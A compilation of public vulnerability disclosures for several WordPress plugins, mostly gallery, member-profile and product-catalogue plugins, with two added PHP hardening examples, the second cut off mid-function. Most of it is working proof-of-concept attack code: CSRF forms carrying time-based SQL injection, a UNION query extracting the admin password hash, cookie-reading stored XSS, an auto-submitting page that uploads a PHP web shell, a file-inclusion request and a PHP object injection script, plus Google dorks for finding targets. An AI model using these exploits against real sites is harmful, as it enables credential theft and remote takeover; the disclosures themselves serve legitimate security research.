# Title: Cross-Site Request Forgery & SQL Injection Vulnerabilities in Unite Gallery Lite Wordpress Plugin v1.4.6
# Submitter: Nitin Venkatesh
# Product: Unite Gallery Lite Wordpress Plugin
# Product URL: https://wordpress.org/plugins/unite-gallery-lite/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89]
# Affected Versions: v1.4.6 and possibly below.
# Tested versions: v1.4.6
# Fixed Version: v1.5
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1178586/unite-gallery-lite
# Changelog: https://wordpress.org/plugins/unite-gallery-lite/changelog/
# CVE Status: New & Unassigned
## Product Information:
Unite Gallery is an all-in-one image and video gallery for WordPress.
## Vulnerability Description:
The admin forms of the Unite Gallery Lite WordPress plugin are susceptible to CSRF. Additionally, the following parameters were found to be susceptible to SQLi:
Form submitted to /wp-admin/admin-ajax.php:
- data[galleryID]
Form submitted to /wp-admin/admin.php:
- galleryid
- id
## Proof of Concept:
<!DOCTYPE html>
<html>
<head>
<title>CSRF + SQLi in Unite Gallery Lite Wordpress Plugin v1.4.6</title>
</head>
<body>
<h1>CSRF + SQLi in Unite Gallery Lite Wordpress Plugin v1.4.6</h1>
<p>CSRF - Create Gallery</p>
<form action="http://localhost/wp-admin//admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='create_gallery' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[main][title]" value='test 2' />
<input type="hidden" name="data[main][alias]" value='test2' />
<input type="hidden" name="data[main][category]" value='new' />
<input type="hidden" name="data[main][full_width]" value='true' />
<input type="hidden" name="data[main][gallery_width]" value='1000' />
<input type="submit" value="submit" />
</form>
<p>CSRF + SQLi - Update Gallery</p>
<form action="http://localhost/wp-admin//admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='update_gallery' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[main][title]" value='test 2' />
<input type="hidden" name="data[main][alias]" value='test2' />
<input type="hidden" name="data[main][shortcode]" value='[unitegallery test2]' />
<input type="hidden" name="data[main][category]" value='3' />
<input type="hidden" name="data[main][full_width]" value='true' />
<input type="hidden" name="data[main][gallery_width]" value='1000' />
<input type="hidden" name="data[main][gallery_min_width]" value='150' />
<input type="hidden" name="data[params][tile_width]" value='160' />
<input type="hidden" name="data[params][tile_height]" value='160' />
<input type="hidden" name="data[params][theme_gallery_padding]" value='0' />
<input type="hidden" name="data[params][theme_carousel_align]" value='center' />
<input type="hidden" name="data[params][theme_carousel_offset]" value='0' />
<input type="hidden" name="data[params][gallery_shuffle]" value='false' />
<input type="hidden" name="data[params][tile_image_resolution]" value='medium' />
<input type="hidden" name="data[params][carousel_padding]" value='8' />
<input type="hidden" name="data[params][carousel_space_between_tiles]" value='20' />
<input type="hidden" name="data[params][carousel_scroll_duration]" value='500' />
<input type="hidden" name="data[params][carousel_scroll_easing]" value='easeOutCubic' />
<input type="hidden" name="data[params][carousel_autoplay]" value='true' />
<input type="hidden" name="data[params][carousel_autoplay_timeout]" value='3000' />
<input type="hidden" name="data[params][carousel_autoplay_direction]" value='right' />
<input type="hidden" name="data[params][carousel_autoplay_pause_onhover]" value='true' />
<input type="hidden" name="data[params][theme_enable_navigation]" value='true' />
<input type="hidden" name="data[params][theme_navigation_enable_play]" value='true' />
<input type="hidden" name="data[params][theme_navigation_align]" value='center' />
<input type="hidden" name="data[params][theme_navigation_offset_hor]" value='0' />
<input type="hidden" name="data[params][theme_navigation_position]" value='bottom' />
<input type="hidden" name="data[params][theme_navigation_margin]" value='20' />
<input type="hidden" name="data[params][theme_space_between_arrows]" value='5' />
<input type="hidden" name="data[params][carousel_navigation_numtiles]" value='3' />
<input type="hidden" name="data[params][position]" value='center' />
<input type="hidden" name="data[params][margin_top]" value='0' />
<input type="hidden" name="data[params][margin_bottom]" value='0' />
<input type="hidden" name="data[params][margin_left]" value='0' />
<input type="hidden" name="data[params][margin_right]" value='0' />
<input type="hidden" name="data[params][tile_enable_action]" value='true' />
<input type="hidden" name="data[params][tile_as_link]" value='false' />
<input type="hidden" name="data[params][tile_link_newpage]" value='true' />
<input type="hidden" name="data[params][tile_enable_border]" value='true' />
<input type="hidden" name="data[params][tile_border_width]" value='3' />
<input type="hidden" name="data[params][tile_border_color]" value='#f0f0f0' />
<input type="hidden" name="data[params][tile_border_radius]" value='0' />
<input type="hidden" name="data[params][tile_enable_outline]" value='true' />
<input type="hidden" name="data[params][tile_outline_color]" value='#8b8b8b' />
<input type="hidden" name="data[params][tile_enable_shadow]" value='false' />
<input type="hidden" name="data[params][tile_shadow_h]" value='1' />
<input type="hidden" name="data[params][tile_shadow_v]" value='1' />
<input type="hidden" name="data[params][tile_shadow_blur]" value='3' />
<input type="hidden" name="data[params][tile_shadow_spread]" value='2' />
<input type="hidden" name="data[params][tile_shadow_color]" value='#8b8b8b' />
<input type="hidden" name="data[params][tile_enable_image_effect]" value='false' />
<input type="hidden" name="data[params][tile_image_effect_type]" value='bw' />
<input type="hidden" name="data[params][tile_image_effect_reverse]" value='false' />
<input type="hidden" name="data[params][tile_enable_overlay]" value='true' />
<input type="hidden" name="data[params][tile_overlay_opacity]" value='0.4' />
<input type="hidden" name="data[params][tile_overlay_color]" value='#000000' />
<input type="hidden" name="data[params][tile_enable_icons]" value='true' />
<input type="hidden" name="data[params][tile_show_link_icon]" value='false' />
<input type="hidden" name="data[params][tile_space_between_icons]" value='26' />
<input type="hidden" name="data[params][tile_enable_textpanel]" value='false' />
<input type="hidden" name="data[params][tile_textpanel_source]" value='title' />
<input type="hidden" name="data[params][tile_textpanel_always_on]" value='false' />
<input type="hidden" name="data[params][tile_textpanel_appear_type]" value='slide' />
<input type="hidden" name="data[params][tile_textpanel_padding_top]" value='8' />
<input type="hidden" name="data[params][tile_textpanel_padding_bottom]" value='8' />
<input type="hidden" name="data[params][tile_textpanel_padding_left]" value='11' />
<input type="hidden" name="data[params][tile_textpanel_padding_right]" value='11' />
<input type="hidden" name="data[params][tile_textpanel_bg_color]" value='#000000' />
<input type="hidden" name="data[params][tile_textpanel_bg_opacity]" value='0.6' />
<input type="hidden" name="data[params][tile_textpanel_title_color]" value='#ffffff' />
<input type="hidden" name="data[params][tile_textpanel_title_text_align]" value='left' />
<input type="hidden" name="data[params][tile_textpanel_title_font_size]" value='14' />
<input type="hidden" name="data[params][tile_textpanel_title_bold]" value='true' />
<input type="hidden" name="data[params][lightbox_type]" value='wide' />
<input type="hidden" name="data[params][lightbox_hide_arrows_onvideoplay]" value='true' />
<input type="hidden" name="data[params][lightbox_slider_control_zoom]" value='true' />
<input type="hidden" name="data[params][gallery_mousewheel_role]" value='zoom' />
<input type="hidden" name="data[params][lightbox_overlay_opacity]" value='1' />
<input type="hidden" name="data[params][lightbox_overlay_color]" value='#000000' />
<input type="hidden" name="data[params][lightbox_top_panel_opacity]" value='0.4' />
<input type="hidden" name="data[params][lightbox_show_numbers]" value='true' />
<input type="hidden" name="data[params][lightbox_numbers_size]" value='14' />
<input type="hidden" name="data[params][lightbox_numbers_color]" value='#e5e5e5' />
<input type="hidden" name="data[params][lightbox_show_textpanel]" value='true' />
<input type="hidden" name="data[params][lightbox_textpanel_width]" value='550' />
<input type="hidden" name="data[params][lightbox_textpanel_source]" value='title' />
<input type="hidden" name="data[params][lightbox_textpanel_title_color]" value='#e5e5e5' />
<input type="hidden" name="data[params][lightbox_textpanel_title_text_align]" value='left' />
<input type="hidden" name="data[params][lightbox_textpanel_title_font_size]" value='14' />
<input type="hidden" name="data[params][lightbox_textpanel_title_bold]" value='false' />
<input type="hidden" name="data[params][lightbox_compact_overlay_opacity]" value='0.6' />
<input type="hidden" name="data[params][lightbox_compact_overlay_color]" value='#000000' />
<input type="hidden" name="data[params][lightbox_arrows_position]" value='sides' />
<input type="hidden" name="data[params][lightbox_arrows_inside_alwayson]" value='false' />
<input type="hidden" name="data[params][lightbox_compact_show_numbers]" value='true' />
<input type="hidden" name="data[params][lightbox_compact_numbers_size]" value='14' />
<input type="hidden" name="data[params][lightbox_compact_numbers_color]" value='#e5e5e5' />
<input type="hidden" name="data[params][lightbox_compact_numbers_padding_top]" value='7' />
<input type="hidden" name="data[params][lightbox_compact_numbers_padding_right]" value='5' />
<input type="hidden" name="data[params][lightbox_compact_show_textpanel]" value='true' />
<input type="hidden" name="data[params][lightbox_compact_textpanel_source]" value='title' />
<input type="hidden" name="data[params][lightbox_compact_textpanel_title_color]" value='#e5e5e5' />
<input type="hidden" name="data[params][lightbox_compact_textpanel_title_font_size]" value='14' />
<input type="hidden" name="data[params][lightbox_compact_textpanel_title_bold]" value='false' />
<input type="hidden" name="data[params][lightbox_compact_textpanel_padding_top]" value='5' />
<input type="hidden" name="data[params][lightbox_compact_textpanel_padding_left]" value='10' />
<input type="hidden" name="data[params][lightbox_compact_textpanel_padding_right]" value='10' />
<input type="hidden" name="data[params][lightbox_compact_slider_image_border]" value='true' />
<input type="hidden" name="data[params][lightbox_compact_slider_image_border_width]" value='10' />
<input type="hidden" name="data[params][lightbox_compact_slider_image_border_color]" value='#ffffff' />
<input type="hidden" name="data[params][lightbox_compact_slider_image_border_radius]" value='0' />
<input type="hidden" name="data[params][lightbox_compact_slider_image_shadow]" value='true' />
<input type="hidden" name="data[params][include_jquery]" value='true' />
<input type="hidden" name="data[params][js_to_body]" value='false' />
<input type="hidden" name="data[params][compress_output]" value='false' />
<input type="hidden" name="data[params][gallery_debug_errors]" value='false' />
<!-- SQLi -->
<input type="hidden" name="data[galleryID]" value='1 AND (SELECT * FROM (SELECT(SLEEP(5)))rock)' />
<input type="submit" value="submit" />
</form>
<p>CSRF - Add Items</p>
<form action="http://localhost/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='add_item' />
<input type="hidden" name="gallery_type" value='' />
<input type="hidden" name="data[type]" value='html5video' />
<input type="hidden" name="data[title]" value='test' />
<input type="hidden" name="data[description]" value='' />
<input type="hidden" name="data[urlImage]" value='' />
<input type="hidden" name="data[urlThumb]" value='' />
<input type="hidden" name="data[urlVideo_mp4]" value='http://video-js.zencoder.com/oceans-clip.mp4' />
<input type="hidden" name="data[urlVideo_webm]" value='http://video-js.zencoder.com/oceans-clip.webm' />
<input type="hidden" name="data[urlVideo_ogv]" value='http://video-js.zencoder.com/oceans-clip.ogv' />
<input type="hidden" name="data[catID]" value='4' />
<input type="submit" value="submit" />
</form>
<p>CSRF + SQLi - Retrieve Items (Edit Settings - Items Tab)</p>
<form action="http://localhost/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='get_cat_items' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[catID]" value='3' />
<!-- SQLi -->
<input type="hidden" name="data[galleryID]" value='1 AND (SELECT * FROM
(SELECT(SLEEP(5)))rock)' />
<input type="submit" value="submit" />
</form>
<p>CSRF + SQLi - Action buttons</p>
<ul>
<li><a href="http://localhost/wp-admin/admin.php?page=unitegallery&view=items&galleryid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)">http://localhost/wp-admin/admin.php?page=unitegallery&view=items&galleryid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)</a></li>
<li><a href="http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)">http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)</a></li>
</ul>
</body>
</html>
## Solution:
Upgrade to v1.5 or higher
## Disclosure Timeline:
2015-06-06 - Discovered. Reported to developer.
2015-06-10 - Updated version released.
2015-07-25 - Publishing disclosure on FD mailing list
## Disclaimer:
This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.
# Title : WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion
# Author : mehran feizi
# Vendor : https://wordpress.org/plugins/ultimate-member/
# Category : Webapps
# Date : 2020-02-11
# Vendor home page: https://wordpress.org/plugins/ultimate-member/
Vulnerable Page:
/class-admin-upgrade.php
Vulnerable Source:
354: if(empty($_POST['pack'])) else
356: include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php';
Exploit:
localhost/wp-content/plugins/worprees plugin bug dar/ultimate-member/includes/admin/core/class-admin-upgrade.php
$_POST('pack')=<script>alert('xss')</script>
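As an added example, not Ultimate Member's own code, this is how an include path built from a request parameter can be constrained so that only a real package subdirectory can be selected. Names prefixed example_ and the packages directory are assumptions; check_admin_referer, current_user_can, wp_unslash, wp_die and WP_PLUGIN_DIR are WordPress core.

```php
<?php
// Added example (not Ultimate Member's own code). Names prefixed example_ and
// the packages directory are illustrative; the WordPress helpers are core.

// Vulnerable shape quoted above (line 356): the POST value is spliced into an
// include path, so "../" sequences or an arbitrary directory name decide which
// init.php gets executed.
//   include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php';

// Return the absolute path of <packages_dir>/<pack>/init.php, or false unless
// the name is a plain single path component AND the resolved file really sits
// under $packages_dir.
function example_resolve_package_init( $packages_dir, $pack ) {
    // Syntactic allowlist: no slashes, dots or NUL bytes can pass this.
    if ( ! is_string( $pack ) || ! preg_match( '/^[A-Za-z0-9_-]{1,64}$/', $pack ) ) {
        return false;
    }
    $base = realpath( $packages_dir );
    if ( false === $base ) {
        return false;
    }
    // realpath() collapses symlinks and returns false for a missing file.
    $init = realpath( $base . DIRECTORY_SEPARATOR . $pack . DIRECTORY_SEPARATOR . 'init.php' );
    if ( false === $init || 0 !== strpos( $init, $base . DIRECTORY_SEPARATOR ) ) {
        return false;
    }
    return $init;
}

// The upgrade handler also needs a nonce and a capability check: it is an
// admin-side POST that a cross-site form could otherwise submit on the
// administrator's behalf.
function example_run_package_upgrade() {
    check_admin_referer( 'example_run_package_upgrade' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'forbidden', '', array( 'response' => 403 ) );
    }
    $pack = isset( $_POST['pack'] ) ? wp_unslash( $_POST['pack'] ) : '';
    $init = example_resolve_package_init( WP_PLUGIN_DIR . '/example-plugin/packages', $pack );
    if ( false === $init ) {
        wp_die( 'unknown package', '', array( 'response' => 400 ) );
    }
    include_once $init;
}
```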
================================================================
CSRF/Stored XSS Vulnerability in Ultimate profile Builder Plugin
================================================================
.. contents:: Table Of Content
Overview
========
* Title: CSRF and Stored XSS Vulnerability in Ultimate Profile Builder Wordpress Plugin
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://downloads.wordpress.org/plugin/ultimate-profile-builder.zip
* Severity: HIGH
* Version Affected: Version 2.3.3 and mostly prior to it
* Version Tested : Version 2.3.3
* version patched:
Description
===========
Vulnerable Parameter
--------------------
* Label
* CSS Class attribute
About Vulnerability
-------------------
This plugin is vulnerable to a combined CSRF/XSS attack: if an admin user can be tricked into visiting a crafted URL created by the attacker (via spear phishing or social engineering), the attacker can insert arbitrary script into the admin page. Once exploited, the admin's browser can be made to do almost anything the admin user could normally do, for example by hijacking the admin's cookies.
Vulnerability Class
===================
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
Steps to Reproduce: (POC)
=========================
After installing the plugin:
1. Go to Settings -> Ultimate Profile Builder.
2. Insert this payload ## <script>alert("1")</script> ## into the vulnerable parameters mentioned above, save the settings and see the XSS in action.
3. Visit the Ultimate Profile Builder settings page of this plugin at any later time and you can see the script executing, as it is stored.
The plugin does not use any nonces and hence the same settings can be changed using a CSRF attack; the PoC code for this is below.
CSRF POC Code
=============
::

    <html>
    <body>
    <form action="http://127.0.0.1/wp/wp-admin/admin.php?page=UltimatePB_Field" method="POST">
    <input type="hidden" name="select_type" value="heading" />
    <input type="hidden" name="field_user_groups[]" value="administrator" />
    <input type="hidden" name="field_name" value="<script>alert("1")</script>" />
    <input type="hidden" name="field_value" value="<script>alert("1")</script>" />
    <input type="hidden" name="field_class" value="<script>alert("1")</script>" />
    <input type="hidden" name="field_maxLenght" value="" />
    <input type="hidden" name="field_cols" value="" />
    <input type="hidden" name="field_rows" value="" />
    <input type="hidden" name="field_Options" value="" />
    <input type="hidden" name="field_Des" value="<script>alert("1")</script>" />
    <input type="hidden" name="field_ordering" value="1" />
    <input type="hidden" name="field_submit" value="Save" />
    <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>
Mitigation
==========
No Update
Change Log
==========
no Update
Disclosure
==========
11-April-2015 Reported to Developer
No Update
credits
=======
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh (at) me (dot) com
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
# Exploit Title: Ultimate Product Catalogue 4.2.2 Sql Injection – Plugin WordPress – Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link: https://wordpress.org/plugins/ultimate-product-catalogue/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 4.2.2
# Tested on: Ubuntu 16.04
1 - Description:
Required user access: registered user.
$_POST['CatID'] is not escaped.
http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-injection/
2 - Proof of Concept:
1 – Login as regular user (created using wp-login.php?action=register):
2 – Using:
<form method="post" action="http://target/wp-admin/admin-ajax.php?action=get_upcp_subcategories">
<input type="text" name="CatID" value="0 UNION SELECT user_login,user_pass FROM wp_users WHERE ID=1">
<input type="submit">
</form>
3 - Timeline:
- 22/05/2017 – Discovered
- 24/05/2017 – Vendor not found
- **/06/2017 - Corrected
# Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate Product Catalogue 3.1.2
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category", inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Communicated and Fixed by the Vendor in 3.1.5
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
1. Summary:
Ultimate Product Catalogue is a responsive and easily customizable plugin for all your product catalogue needs. It has +63.000 downloads and +4.000 active installations.
The Product Name and Description fields and the File Upload form of the Ultimate Product Catalog plugin lack proper CSRF protection and proper filtering. This allows an attacker to alter a product presented to a customer or to the WordPress administrators and to insert XSS into its product name and description. It also allows an attacker to upload a PHP script through CSRF, due to a lack of file type filtering on upload.
2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Communicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com; two SQLi fixed in 3.1.3 but not these vulnerabilities.
- 28/04/2015: Fixed in version 3.1.5 without notifying me.
3. Vulnerable code:
In file html/ProductPage, multiple lines.
4. Proof of concept:
https://www.youtube.com/watch?v=roB_ken6U4o
----------------------------------------------------------------------------------------------
------------- CSRF & XSS in Product Description and Name -----------
----------------------------------------------------------------------------------------------
<iframe width=0 height=0 style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://<web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16' target="csrf-frame" id="csrf-form">
<input type='hidden' name='action' value='Edit_Product'>
<input type='hidden' name='_wp_http_referer' value='/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16'/>
<input type='hidden' name='Item_Name' value="Product name</a><script>alert('Product Name says: '+document.cookie)</script><a>"/>
<input type='hidden' name='Item_Slug' value='asdf'/>
<input type='hidden' name='Item_ID' value='16'/>
<input type='hidden' name='Item_Image' value='http://i.imgur.com/6cWKujq.gif'>
<input type='hidden' name='Item_Price' value='666'>
<input type='hidden' name='Item_Description' value="Product description says<script>alert('Product description says: '+document.cookie)</script>"/>
<input type='hidden' name='Item_SEO_Description' value='seo desc'>
<input type='hidden' name='Item_Link' value=''>
<input type='hidden' name='Item_Display_Status' value='Show'>
<input type='hidden' name='Category_ID' value=''>
<input type='hidden' name='SubCategory_ID' value=''>
<input style="display:none" type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
----------------------------------------------------------------------------------------------
-------- CSRF & File Upload in Product Description and Name ------
----------------------------------------------------------------------------------------------
<html>
<body onload="submitRequest();">
<script>
function submitRequest()
{
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http://<web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_AddProductSpreadsheet&DisplayPage=Product", true);
    xhr.setRequestHeader("Host", "<web>");
    xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
    xhr.setRequestHeader("Cache-Control", "max-age=0");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8,es;q=0.6");
    xhr.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36");
    xhr.setRequestHeader("Accept-Encoding", "gzip, deflate");
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundarylPTZvbxAcw0q01W3");
    var body = "------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" +
        "Content-Disposition: form-data; name=\"Products_Spreadsheet\"; filename=\"cooldog.php\"\r\n" +
        "Content-Type: application/octet-stream\r\n" +
        "\r\n" +
        "<?php\r\n" +
        "exec($_GET['c'],$output);\r\n" +
        "foreach ($output as $line) {\r\n" +
        "echo \"<br/>\".$line;\r\n" +
        "}\r\n" +
        "?>\r\n" +
        "------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" +
        "Content-Disposition: form-data; name='submit'\r\n" +
        "\r\n" +
        "Add New Products\r\n" +
        "------WebKitFormBoundarylPTZvbxAcw0q01W3--\r\n";
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input style="display:none;" type="submit" value="Up!" onclick="submitRequest();" />
</form>
</body>
</html>
The file cooldog.php is now available at http://<web>/wp-content/plugins/ultimate-product-catalogue/product-sheets/cooldog.php
5. Solution:
Update to version 3.1.5
# Exploit Title: Unauthenticated SQLi on Ultimate Product Catalogue wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category", inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: < 3.1.2, Communicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : Requested to mitre but not assigned yet
# Category: webapps
1. Summary:
Ultimate Product Catalogue is a responsive and easily customizable plugin for all your product catalogue needs. It has +59.000 downloads and +3.000 active installations.
Unauthenticated SQL injection in the parameter "SingleProduct" when a web visitor views a product published by the web administrator.
2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Communicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
3. Vulnerable code:
File Functions/Shortcodes.php line 779
4. Proof of concept:
http://<wordpress site>/?SingleProduct=2'+and+'a'='a
http://<wordpress site>/?SingleProduct=2'+and+'a'='b
5. Solution:
Update to version 3.1.3
# Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate Product Catalogue wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category", inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: < 3.1.2, Communicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : Requested to mitre but not assigned yet
# Category: webapps
1. Summary:
Ultimate Product Catalogue is a responsive and easily customizable plugin for all your product catalogue needs. It has +59.000 downloads and +3.000 active installations.
Unauthenticated SQL injection in the AJAX call that counts how many times a product has been viewed by web visitors. The vulnerable POST parameter is "Item_ID".
2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Communicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
3. Vulnerable code:
In file Functions/Process_Ajax.php line 67:
[...]
$Item_ID = $_POST['Item_ID'];
$Item = $wpdb->get_row("SELECT Item_Views FROM $items_table_name WHERE Item_ID=" . $Item_ID);
[...]
4. Proof of concept:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <wordpress host>
[...]
Cookie: wordpress_f305[...]
Item_ID=2 AND SLEEP(5)&action=record_view
5. Solution:
Update to version 3.1.3
# Exploit Title: [WP Plugin Ultimate Product Catalog 4.2.24 PHP Object Injection]
# Google Dork: [NA]
# Date: [Okt 30 2017]
# Exploit Author: [tomplixsee]
# Author blog : [cupuzone.wordpress.com]
# Vendor Homepage: [http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/]
# Software Link: [https://wordpress.org/plugins/ultimate-product-catalogue/]
# Version: [<= 4.2.24]
# Tested on: [Ubuntu Server 16.04]
# CVE : [NA]
Tested on plugin versions 4.2.23 and 4.2.24.
A crafted cookie can be sent to the vulnerable function without logging in.
1. vulnerable code on Functions/Process_Ajax.php <= tested
// Adds an item to the plugin's cart
function UPCP_Add_To_Cart() {
    global $woocommerce;
    global $wpdb;
    global $items_table_name;

    $WooCommerce_Checkout = get_option("UPCP_WooCommerce_Checkout");

    if ($WooCommerce_Checkout == "Yes") {
        $WC_Prod_ID = $wpdb->get_var($wpdb->prepare("SELECT Item_WC_ID FROM $items_table_name WHERE Item_ID=%d", sanitize_text_field($_POST['prod_ID'])));
        echo "WC ID: " . $WC_Prod_ID . "<Br>";
        $woocommerce->cart->add_to_cart($WC_Prod_ID);
    }

    if (isset($_COOKIE['upcp_cart_products'])) {
        $Products_Array = unserialize(str_replace('\"', '"', $_COOKIE['upcp_cart_products']));
    }
    else {
        $Products_Array = array();
    }

    $Products_Array[] = $_POST['prod_ID'];
    $Products_Array = array_unique($Products_Array);
    setcookie('upcp_cart_products', serialize($Products_Array), time()+3600*24*3, "/");
}
add_action('wp_ajax_upcp_add_to_cart', 'UPCP_Add_To_Cart');
add_action( 'wp_ajax_nopriv_upcp_add_to_cart', 'UPCP_Add_To_Cart' );
2. vulnerable code on Functions/Shortcodes.php <= not tested
POC
1. Use a WP plugin to test PHP object injection, like this one: https://www.pluginvulnerabilities.com/2017/07/24/wordpress-plugin-for-use-in-testing-for-php-object-injection/
2. Make the request:
#-----------------------------------
#!/usr/bin/env python3
import requests

url = "http://vbox-ubuntu-server.me/wordpress/wp-admin/admin-ajax.php"
data = {'action': 'upcp_add_to_cart'}
headers = {
    'Content-type': 'application/x-www-form-urlencoded',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    # serialized instance of the test plugin's class; the vulnerable handler unserializes it
    'Cookie': 'upcp_cart_products=O:20:"PHP_Object_Injection":0:{}'
}
r = requests.post(url, data=data, headers=headers)
print(r.content)
#------------------------------------
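As an added example, not Ultimate Product Catalogue's own code, this is the cart cookie handled without unserialize(): the cookie is parsed as a JSON list of positive integers, so the serialized-object probe quoted above cannot instantiate anything. Names prefixed example_ are assumptions; absint, wp_send_json_success, add_action and DAY_IN_SECONDS are WordPress core.

```php
<?php
// Added example (not the plugin's own code). Names prefixed example_ are
// illustrative; the WordPress helpers used are core.

// Vulnerable shape quoted above: unserialize() runs on cookie data the client
// fully controls, so any loaded class with a __wakeup()/__destruct() gadget is
// instantiated before the cart contents are even looked at.
//   $Products_Array = unserialize( str_replace( '\"', '"', $_COOKIE['upcp_cart_products'] ) );

// Read the cart as a JSON array of positive integers. The advisory's probe
// 'O:20:"PHP_Object_Injection":0:{}' is not valid JSON and yields an empty
// cart; so does any nested array or non-numeric entry.
function example_read_cart_cookie( $raw ) {
    if ( ! is_string( $raw ) || '' === $raw || strlen( $raw ) > 2048 ) {
        return array();
    }
    $decoded = json_decode( $raw, true );
    if ( ! is_array( $decoded ) ) {
        return array();
    }
    $ids = array();
    foreach ( $decoded as $v ) {
        if ( is_int( $v ) && $v > 0 ) {
            $ids[] = $v;
        } elseif ( is_string( $v ) && ctype_digit( $v ) && (int) $v > 0 ) {
            $ids[] = (int) $v;
        }
    }
    return array_values( array_unique( $ids ) );
}

function example_add_to_cart() {
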